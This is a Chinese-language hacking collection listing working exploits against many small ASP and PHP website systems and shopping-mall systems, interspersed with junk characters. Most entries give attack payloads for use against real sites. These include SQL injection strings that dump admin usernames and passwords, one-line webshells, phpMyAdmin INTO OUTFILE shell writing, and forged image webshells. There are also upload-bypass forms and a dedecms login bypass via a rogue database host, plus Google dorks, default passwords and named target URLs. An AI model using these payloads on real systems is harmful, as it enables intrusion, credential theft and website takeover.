启航企业建站系统 cookie注入漏洞通杀所有版本
7 b* G) Y* {* R R6 o7 r$ G2 L# H2 J$ y+ u4 f- s, q
直接上exploit:
) k3 v% G: ]5 r/ ajavascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
3 J: _) ?& G4 [" C) ~5 C9 E* etest:http://www.tb11.net/system/xitong/shownews.asp?id=210' \8 R. c( C; L% i: D
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------) i5 X4 K; b. E! W. w
Asprain论坛 注册用户 上传图片就可拿到webshell
/ x& R9 C+ \, F7 x# e! S$ n
. m. m+ U& V: e( C5 zAsprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。
* V( z% P1 h( p. l T% G1.txt存放你的一句话马 如:<%execute(request("cmd"))%>0 ?& k" N: l; B
2.gif 为一小图片文件,一定要小,比如qq表情图片
4 I/ h1 f7 r+ {+ v% o. {3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
% m8 _) }* d/ \( o& M4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
4 C6 X3 ]* A1 a( ^5.q.asp;.gif5 s8 l# s/ `6 ]) G7 P2 k
google:Powered by Asprain
" L/ X1 t/ @2 z* q0 G--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
5 F4 f- c, n$ h
2 \3 z O8 b2 ?# ^7 S& D+ m+ J/ N) tShopNum1全部系统存在上传漏洞。
: y/ K) d" w8 F+ `* \! }
% Z) a4 T6 `& N, J. \2 J5 n. v) G首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
& J) j2 ?+ d' ?2 S7 q* B) K4 ~按说明 提示登录后台。。
: E8 Z/ }* u Q在后台功能页面->附件管理->附件列表8 L# [% }# }9 O- J) O
可以直接上传.aspx 后缀木马
1 W; w6 @6 M, Z% J8 _- k7 Thttp://demo.shopnum1.com/upload/20110720083822500.aspx
/ N3 H) d8 l" l. Q* q--------------------------------------------------------------------------------------------------------------------------------------------------------------------------2 x' W4 w" {2 B
9 h I0 }3 O4 M牛牛CMS中小企业网站管理系统 上传漏洞
. |4 G0 X6 ]# F$ e4 {
& R0 x+ g* @! w3 Y+ J$ X/ s7 M牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。2 V8 g, e" f2 O& T& J5 c2 P8 C
后台:admin/login.asp" o4 M! ?* w2 T+ _
ewebeditor 5.5 Nday0 z/ z' r, P! `/ \7 {" f$ i
exp:6 H6 p/ f6 E) o, ~) C
<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">?
2 H/ B6 R, N) }4 J; f<input?type=file?name=uploadfile?size=100><br><br>?
0 [" e; G" B$ q* c<input?type=submit?value=upload>?+ \, `" S' A* R% O. c0 h; d E
</form>
! R8 p6 A/ s) Tps:先上传小马.$ |) j" T( B4 T! A( E' [3 P) u& m8 M: C
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏
. u) F6 r! c$ P3 ?+ T
5 Q g7 U5 U8 v! \+ k--------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 u1 s3 w# n3 k7 p! ?/ T
4 z5 G1 y, ^( q) w; X' T+ E+ R8 g% qYothCMS 遍历目录漏洞
- s' L U5 t! a1 u" o
; J k# H4 _- c, @) J7 w优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
- [3 O* S* \1 S1 n2 Y- |9 n5 z默认后台:admin/login.asp1 u, z, o {% W! P
遍历目录:
) }! J2 s, B' pewebeditor/manage/upload.asp?id=1&dir=../
7 s; f3 K3 \/ e+ v6 ?- ^! xdata:
# s; r; V+ O( zhttp://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa2 i1 }9 s$ c6 J; r
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 x+ G3 @/ v4 B6 P4 U% b! K$ r
( w* X# M* y+ X4 t: t' YNet112企业建站系统 1.0
" l# w. m" U, u' k. m3 x7 W7 d* ~' e( b2 d3 U+ g
源码简介:5 `6 c" G: Z7 X" A0 Q
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
: M5 {1 j4 R$ T- k n, M$ o添加管理员:# d& a4 U9 l d) u4 f2 J
http://www.0855.tv/admin/admin.asp?action=add&level=2
: m; B: X6 x4 H" R2 v其实加不加都不是很重要,后台文件都没怎么作验证。
0 j' ]# [1 d4 `5 i+ Q8 E& M上传路径:$ x$ X7 K5 I# ]7 w& G) Y
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200! C. y4 J1 ~7 h& T M- c7 i
http://www.0855.tv/inc/Upfile.asp?Stype=20 ?, E: ^5 i* O8 I
怎么利用自己研究。% X! r, k/ |1 E. `, S8 Z7 w, i$ a
遍历目录:
; B6 u: ?! s9 f2 T9 a" e, ihttp://www.0855.tv/admin/upfile.asp?path=../..( |/ _0 I8 p: k6 Y5 s5 Y
如:
" J+ J5 t/ I: R4 ~3 N$ ?3 Yhttp://www.0855.tv/admin/upfile.asp?path=../admin
# m ]+ o' E5 Bhttp://www.0855.tv/admin/upfile.asp?path=../data
3 n, }7 n6 D1 k--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
; W1 P7 d; q. v, p! C1 s& X; H- ^' n3 ^4 _0 Q# j& v
易和阳光购物商城通杀 上传漏洞
) `# U. _0 a; _- E9 D) `
) h5 H4 n( x* n$ e- ?) B' e前提要求是IIS6.0+asp坏境。
5 ?# z' c0 G, B+ G漏洞文件Iheeo_upfile.asp - K+ {5 @8 ~" O4 Z
过滤不严.直接可以iis6.0上传
( R& z/ L# P3 D" c$ X+ C把ASP木马改成0855.asp;1.gif
, `" w) r, L, U8 B2 f* X0 c直接放到明小子上传! t# t6 [6 `8 d; M+ q9 Q
Google搜索:inurl:product.asp?Iheeoid=- j" d9 e& s9 X
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" S: W, s# d& }" _* T3 }6 a
# V. A+ k% n5 c# ^6 @4 H" yphpmyadmin后台4种拿shell方法1 \# U' o, g1 v7 q& L3 d0 u
* d. Q/ P* K6 o" q
方法一:
/ c7 _/ c G. z& v8 q% Y5 CCREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );, [: u8 B' L. y# R, K
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');/ X" `9 V9 |- }: p: Q
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
. j4 }0 v- P3 T9 D4 y----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php* k$ U: z4 H/ r0 e
一句话连接密码:xiaoma7 Z' ^5 G6 w6 c
方法二:
1 x3 F5 g L2 }) u3 {/ h- b; sCreate TABLE xiaoma (xiaoma1 text NOT NULL);8 k. d, o" t/ k5 m
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');
. n: J, w2 W/ Y: Vselect xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';9 K3 n. x1 n4 y6 b+ }- W
Drop TABLE IF EXISTS xiaoma;
% \2 }0 G+ G4 ^; R2 N方法三:
( Y, [% B) X% j! i, f* f' M9 i读取文件内容: select load_file('E:/xamp/www/s.php');2 e+ Z. [* D* P* i5 Y* c
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
4 q8 `# M0 [: ]& Z* N% ~9 ecmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
( v0 Z! S" r/ R% i1 u方法四:
8 E2 b9 |* N/ i9 s5 tselect load_file('E:/xamp/www/xiaoma.php');
. ^1 f% u$ F6 g8 P5 T eselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
# u0 T( t# b0 X4 k R" C然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
$ S0 F& w8 ]5 a; k" \- C4 K--------------------------------------------------------------------------------------------------------------------------------------------------------------------------& d% @8 K+ f" u7 u4 f- _
/ G" X5 ^$ a M; A8 E# e" ~ Q8 w; m
传信网络独立开发网站源码0day漏洞- ^0 D, T. K9 n, i
B/ m [) \# {+ ?7 e后台system/login.asp
5 b& N4 F+ T. H4 v进了后台有个ewebeditor1 C) T8 `7 T' S. ^% n
Google 搜索inurl:product1.asp?tyc=* d* m$ x: w% C6 t% F* M1 K% H
编辑器漏洞默认后台ubbcode/admin_login.asp# U( z& L$ C) U* e2 \
数据库ubbcode/db/ewebeditor.mdb
2 Q4 a, l& j+ o2 y5 P- h- }默认账号密码yzm 111111( H5 j, a6 x; l8 i# K" Z
9 s% M# Z0 W( ^; P+ t. M1 g拿webshell方法
5 K5 X7 t# Q9 K# |登陆后台点击“样式管理”-选择新增样式
7 \/ L$ `" A- ~! O样式名称:scriptkiddies 随便写
+ e$ h0 {- q1 e+ |% S/ }/ [路径模式:选择绝对路径
" c8 s& E8 J, L图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx, R, s) E6 {' b; L! N
图片类型比如就是我们要上传的ASP木马格式
3 X* q* ~2 b& H, ^上传路径:/6 q. j; L1 B2 k9 Z) i9 O0 p
图片限制:写上1000 免的上不了我们的asp木马2 z8 v" y& b& J
上传内容不要写
' F# J$ l% T `! Q- e/ i/ }" J可以提交了
9 y* ~+ t' e' ?$ B7 m) g" z* W5 y5 h; H样式增加成功!
% I+ d. p8 {9 ~返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏 4 N' `! O1 Z, p( C
按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置; B6 \ {. _$ _8 u
网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies1 y' B: e9 B R4 x7 d9 P% x
上ASP木马 回车 等到路径+ i. e5 z3 E5 S& R2 i' [# \
% {/ f5 ^3 E" g+ P1 F
后台:system/login.asp
- s! h" Y% G/ o cExp:
9 |3 Z2 {! o6 ~and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master3 a1 d( w- C0 [
测试:' @( ? h! C; @- m$ S. \
http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master* f; e; m9 P, F+ o& X6 ^& V
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master7 p8 X2 L4 T) \6 M3 u7 f: L
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( j, s4 Z2 Y, y% J- h4 ]* g' k$ Q* I4 H; D: k6 k8 B
foosun 0day 最新注入漏洞. x5 E" }' j6 O8 K& p& i& B
5 x# f6 [' j4 m
漏洞文件:www.xxx.com/user/SetNextOptions.asp
+ U% U- Q" I z7 @# J$ l利用简单的方法:
! R& }8 R" C7 l7 I: F7 q暴管理员帐号:& z; f E8 E3 G2 u* \: G
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin8 o& ~( s. ^* r A1 \7 ?3 M, {3 R
暴管理员密码:
4 |+ ]; q" `) Z2 E, }+ T' j; Mhttp://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,% v2 e* t+ C3 F4 {& B
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------( o$ [6 m1 Y# |# {
$ \- z( A/ U: \" r6 w网站程序的版权未知!( R2 n* r4 a" |& p- L/ w
" G6 S. x: l( ^% f; B默认网站数据库:
4 ?7 ~- h) l* S: B5 r* {' Q |www.i0day.com/data/nxnews.mdb2 V, G1 ~8 V& H' `7 M# ~- f
ewebeditor 在线编辑器:
) K/ Q$ o8 Q& E6 O编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb
T! e- ^; ~) U8 ]登录地址:ewebeditor/admin_login.asp# {7 L- f4 z- ~; b( s1 A2 A- ]
默认密码:admin admin
2 ] O$ y& n& G* |8 w' u9 I登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data s$ c# Q& c& s( _: }7 w- g9 D
6 P2 k0 h* h+ D& DSql注入漏洞:
E" X( p$ R/ {2 J0 p' _5 \* Khttp://www.i0day.com/detail.asp?id=12$ n" q6 _# ?4 f; J
exp:( @# S6 @( A' c( L5 C& O& a
union select 1,admin,password,4,5,6,7,8 from admin" g0 S9 X! Z9 ~ _0 t- h
爆出明文帐号/密码
6 X+ } z0 j. y# l5 a
) {( L. g# o3 H6 `上传漏洞:
$ m1 o( v5 G- H后台+upfile.asp( [3 s/ J/ n3 y3 q$ i$ T$ u
如:
) a7 k7 y; c8 ?& bhttp://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
, r5 Q* l" {; |) Q) Eshell的地址:网址+后台+成功上传的马
! c& Z7 d/ j, W" Egoogle:inurl:news.asp?lanmuName=
% j% Z4 n& h# H7 P. }------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% b) N5 {$ g+ a$ ~/ r+ w
; e/ @, I8 {2 S. ]0 e! t9 xdedecms最新0day利用不进后台直接拿WEBSHELL
; H7 Z$ `+ P0 G0 ~4 t) o) x. z) l2 R
拿webshell的方法如下:! R& A1 }8 _7 F( I! c0 _& h) N
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.
+ \% m! k' B' i. a3 m" N, J3 w前题条件,必须准备好自己的dede数据库,然后插入数据:; i7 E2 b% m* C& v: x+ P
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); $ F' q% a' J h0 F7 ~4 k. ]. L
5 c. J" G. H" @( x% S# M再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。
% T1 P+ S/ Y c/ Y2 f3 j<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();"> e. ?8 A3 z6 C" r( O( |6 [
<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />8 I1 y- [% P+ `/ [
<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />* U1 e4 [/ |* L5 I+ E) y
<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />( M4 ~9 p& Q/ f# H9 v7 `8 V7 I# F
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />/ E0 J& J9 L- m" r8 R% `
<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
9 _1 A( \$ |" l4 G5 K<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />% w& M& v: H3 ?/ h
<input type="text" value="true" name="nocache" style="width:400">7 w/ m8 x& \) S0 j# k
<input type="submit" value="提交" name="QuickSearchBtn"><br />( ], B) M3 p0 e1 _) D
</form>
& L; |7 l$ V( `$ H9 n5 H<script>8 R! d2 A6 ?, P1 h+ S# L! D& W
function addaction()
- _0 n. R5 \+ W4 H4 A{2 v R9 ~& s6 p8 \
document.QuickSearch.action=document.QuickSearch.doaction.value;
8 U& N' R0 u& M5 v/ W}, G6 d* D% K( H7 e2 v5 G
</script>3 b0 J# L, \3 ~0 |
-----------------------------------------------------------------------------------------------------------------------------------------------
* O( R2 y$ t! e
' N g, Z' K6 n) w) ?# Q% Bdedecms织梦暴最新严重0day漏洞
5 `: M3 r/ ~# p, ]; f7 a' Pbug被利用步骤如下:8 X( q+ Q) q, \* p- V
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root j- C8 F0 E. y' i9 |( Z7 o# e
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。0 W0 v' W2 H$ @7 i
-------------------------------------------------------------------------------------------------------------------------------------------* Z3 C% X; o6 {" z# P9 j
" g* x& d$ d( Q0 \多多淘宝客程序上传漏洞
4 B; M& ?9 L# z* Z漏洞页面:
7 I7 s6 l3 n% j+ J Badmin\upload_pic.php5 O1 Z/ i$ n9 i$ G" j, ]) X
传送门:" |8 ?, u# C) H H5 l" B6 l
http://www.www.com/admin/upload_pic.php?uploadtext=slide16 g! k! ?/ h0 Z! d- R" l
PS:copy张图片马 直接 xxx.php 上传抓包地址!
& \" |& O; w6 g, x r& C------------------------------------------------------------------------------------------------------------------------------------------------------; ]5 N* E+ I# J8 l$ i2 V8 w
; ?+ {1 V& C: p无忧公司系统ASP专业版后台上传漏洞# Q4 h Q: i1 K% I; R
漏洞文件 后台上传1 I- F7 V" ^, a. p p
admin/uploadPic.asp* j- T, j) r0 A
漏洞利用 这个漏洞好像是雷池的
3 x: ~. n2 |2 f, {http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=1 |, H9 ?* H3 f3 X& ?
等到的webshell路径:
) N* L. T4 L9 r9 p2 ^+ }# [' z/UploadFiles/scriptkiddies.asp;_2.gif8 I% }7 K# ?9 M2 v& l
---------------------------------------------------------------------------------------------------------------------------------------------------. Y$ j( ^0 i7 s% u/ d
% j! U! L/ [& U$ ?4 a: p) Z
住哪酒店分销联盟系统2010
( U1 c$ S7 m% r R, [+ A. dSearch:
1 ?0 j( _! y2 w$ R3 n, Qinurl:index.php?m=hotelinfo
2 T* @- H, s& R) @( nhttp://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin" d3 K$ M* l, r& ~. Z
默认后台:index.php?m=admin/login; C$ x2 z5 B, N' g$ L( G' ^. v
--------------------------------------------------------------------------------------------------------------------------------------------------% c* v% n0 P+ H0 s9 G$ x) K @
* H" Y! c+ R8 h+ @( H; x( [
inurl:info_Print.asp?ArticleID=
' }% w, x% l: J, a. F0 S# K' `; ]/ N后台 ad_login.asp
3 q8 q% F5 C7 j% C& c爆管理员密码:9 H$ ~) D% `( f7 f" K6 h& ~9 n
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin9 B& [( q- f5 F1 Y0 Q* _
------------------------------------------------------------------------------------------------------------------------------------------------------------. M2 x: q7 k: b, }7 f3 P
6 z, m3 J) q0 J& g! j' B搜索框漏洞!/ L, C+ N5 q$ r9 S ?" b6 a
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
! a4 u% s0 H5 b, l( m0 I+ a--------------------------------------------------------------------------------------------------------------------------------------------------------
: s Q% k5 t" |9 [2 y- \
& P! B9 f/ J# K) g6 C& A关键字:8 C) ?! [9 y# Y' S& B: y
inurl:/reg_TemletSel.asp?step=2
9 H/ j/ r x+ \7 H或者
9 I7 |; w) G' g2 X! _ ~% t7 W( }电子商务自助建站--您理想的助手7 a7 b; A6 K* P% Z# ]1 W* f
-------------------------------------------------------------------------------------------------------------------------------------------------
) M: a, G$ ~1 T: ~# G1 n
3 Y$ r+ v! A! {7 Q- l* U1 J2 q. I9 ciGiveTest 2.1.0注入漏洞
2 ]3 p* B8 C! _% k2 R4 a% pVersion: <= 2.1.0
/ L$ q* f" l4 c5 \8 h! ]6 J; b2 {# Homepage: http://iGiveTest.com/
& C7 u: L* z3 m* F4 m谷歌关键字: “Powered by iGiveTest”
8 Q) b1 O& A* ^随便注册一个帐号。然后暴管理员帐号和密码
" l3 D3 i0 g5 I9 w0 W* jhttp://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1
, S1 E1 D: L9 z/ l( h8 a' D------------------------------------------------------------------------------------------------------------------------------------------------
/ l E2 P: g8 ?* f1 s& t! G" u/ w( e& Y$ t7 N0 C
CKXP网上书店注入漏洞8 b8 o8 F, }* ^+ ^) z- Z+ z
工具加表:shop_admin 加字段:admin
7 G L0 H" t. |后台:admin/login.asp 3 J$ y2 N0 `# H& B2 t- ?4 z' I
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
$ k# O5 D) n, v. o, pinurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
' z1 w: @# C* }0 V& K0 v--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: c% m) h+ G4 `/ I6 l, W& b2 ]4 ~7 W' [% E$ B8 P
段富超个人网站系统留言本写马漏洞
" w# H9 k' u& u2 F$ G源码下载:http://www.mycodes.net/24/2149.htm
) Q1 y$ u$ v* U% Z" ^. ?; G2 e: ?addgbook.asp 提交一句话。
* f1 R ~3 w$ v$ e连接: http://www.xxxx.tv/date/date3f.asp
# H/ M/ r% B1 K+ ^8 d7 Rgoogle:为防批量,特略!; O4 _6 W ~' H7 B$ R" j
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 u. l4 n- z0 F* N
% B& A( h( D8 u6 t5 c智有道专业旅游系统v1.0 注入及列目录漏洞
6 @/ z) ?, w& e默认后台路径:/admin/login.asp
* K) e% {& Z+ V6 M$ h$ b默认管理员:admin1 E! P. \" ^6 g/ V
默认密码:123456
! W7 ^; E0 c v ]( B. ISQL EXP Tset:
8 i' k- O7 I4 Y1 G! Ahttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin) j1 u& M: Q3 f6 L/ K5 z) i) a6 t, n
------------------------------------------------------------------------------------------------------------------------------------------------------------------------
( G9 N( d4 W+ U1 D/ n: u0 l: e; f- U+ D6 A) @. d1 m
ewebeditor(PHP) Ver 3.8 本任意文件上传0day
* o3 D# H: F4 ]* L* VEXP:
" @; {( b) V1 C<title>eWebeditoR3.8 for php任意文件上EXP</title># R5 g/ {) _' [5 r
<form action="" method=post enctype="multip
2 i p6 {$ ^* F2 O7 G& b* b% Tart/form-data">
- L7 `- J& ^) j8 H- i<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000">
) B3 G$ N$ \3 j: Y' h/ ]/ UURL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br> 7 l' o1 x# K' b+ A) h( A o
<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
4 t3 e2 K) @& o* L; v0 F X. Ofile:<input type=file name="uploadfile"><br> 2 N5 i- e; M0 X3 Q- ]+ q
<input type=button value=submit onclick=fsubmit()>
% [! o- o& |! n8 I& h</form><br> & w+ p7 Y; Y) y9 [" ?; T% ^
<script> " G3 q, w% N0 Z9 F/ Q4 f
function fsubmit(){ - ~' D, F. d3 L
form = document.forms[0]; 8 Q" b5 k5 Q2 h* w7 x- D: t3 l
form.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en'';
1 _! K7 I2 r) B, falert(form.action);
3 |" z5 d# \9 Q) k" ?, d) X4 b1 xform.submit(); + w# M! k$ D; U+ S
}
" B+ V& s( x- X, e& m4 @</script>
+ p5 [( L* { W! v: B+ ]/ R注意修改里面ewebeditor的名称还有路径。
3 K, |1 l, \2 j K: x---------------------------------------------------------------------------------------------------------------------------------------------------------------------------3 `4 G: d( Y$ U; u* V7 ~
$ |$ H3 B$ i/ T+ w% U; C提交’时提示ip被记录 防注入系统的利用' ?$ a# f) H3 y8 v+ J3 S: Y9 G1 w
网址:http://www.xxx.com/newslist.asp?id=122′
. a3 J, p' v" A! [6 h8 ?. A0 j* T提示“你的操作已被记录!”等信息。7 J" D3 @ j. _) |4 ~, X
利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。4 X+ v o& j* X: f- F
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------8 Q; a0 W$ `# g! D& p- @
; _( N, o0 n1 i2 ]' y$ a8 m' H( Z, r9 F西部商务网站管理系统 批量拿shell-0day
2 N! r% B) g5 \3 U7 b6 F这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
3 O: L. @, F6 A- h4 I1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛# \$ M: J. L9 o1 c. Q
2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合% i$ e3 i8 Y3 n. y# i1 ?9 `! n
3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂& K# p# X9 W6 K% t! f
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------* F" ?/ P9 B. W/ z# X1 _
M, Y% k: [/ f0 A
JspRun!6.0 论坛管理后台注入漏洞- R; @8 w" I( R. \& X9 {$ J ?9 ?
* L, l F+ ^3 R$ p: P dSEBUG-ID:20787 发布时间:2011-04-30 影响版本:! v7 B# A. u7 m; T
JspRun!6.0
1 F7 P8 o0 r0 w: `- T' W) R漏洞描述:, g$ F9 H3 s: \6 }( M+ F2 B
JspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。
( D3 c# ?$ q/ g1 K, p! h% v" S在处理后台提交的文件中ForumManageAction.java第1940行+ j9 i \6 |5 b9 F; T3 _" x' I$ E
String export = request.getParameter("export");//直接获取,没有安全过滤
% I8 U4 K& u/ W' X! X5 Yif(export!=null){
3 r% D# S+ U1 P/ q) y; Z9 EList> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...+ e1 b, a; v* h( t4 `: b: I1 i
if(styles==null||styles.size()==0){
" X7 D/ U* H$ |2 W( `<*参考 M% J/ N' x4 z
nuanfan@gmail.com) J$ t0 ^+ J8 [6 `: m/ P* [0 e+ R
*> SEBUG安全建议:9 X# J! l4 N0 b' A4 ], B
www.jsprun.net
. o# T" p% A7 b: C0 ^(1)安全过滤变量export
7 F, f. g: E3 e9 ~/ J(2)在查询语句中使用占位符) n* M. }8 M2 ?( q3 r# n
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 f: [- F$ U0 v. \# p
& a" @/ c, N% J9 s
乌邦图企业网站系统 cookies 注入' k" a1 Z1 k3 S! I
# F! a) j' Y" y; O$ q
程序完整登陆后台:/admin/login.asp$ `6 |1 l8 Y/ w8 B6 Y
默认登陆帐号:admin 密码:admin888
+ U0 I" M) U; x. D6 }语句:(前面加个空格)0 l( k) {4 U$ {6 ?$ f
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin! j" |4 V |) C) ]
或者是16个字段:! Z( R/ @# D9 q: M6 o: {8 `+ G
and 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin6 O- c, e& [$ [) Q8 J
爆不出来自己猜字段。
2 C% A: k" v1 [. F" _注入点:http://www.untnt.com/shownews.asp?=88- Y. @( ^, W! b' n) J
getshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp ~2 k$ H- B; K; G4 l/ q
关键字:% s6 Z' f) C! m1 L' d# N2 Q; H% l
inurl:shownews?asp.id=
" i* Q4 ~$ ~" b" A, d0 ~6 a' ~7 G-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------" g; [6 p8 K2 {6 ~1 }7 r/ c% d
4 K+ Y* S+ q e* W# BCKXP网上书店注入漏洞
* \, v/ v; h5 l% ?" ~# h4 O8 ~1 `2 K' ^$ k$ x+ | F. Z8 q
工具加表:shop_admin 加字段:admin0 f/ J- b# W* M) q" h5 z
后台:admin/login.asp
) @3 H6 F" e# @# b0 T+ k登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/ E( N5 l2 J4 Y. Z/ O& \! _
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息$ w' ]' g- _ c9 I% m6 n) a
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: Z5 ?2 `# f M" o& l# C; ^0 t) |+ X" w% R6 C; Q* l
YxShop易想购物商城4.7.1版本任意文件上传漏洞
/ g, k; q( Z, [6 \. ?$ I; [9 L( u$ }. H* D! o, Y6 s7 g
http://xxoo.com/controls/fckedit ... aspx/connector.aspx
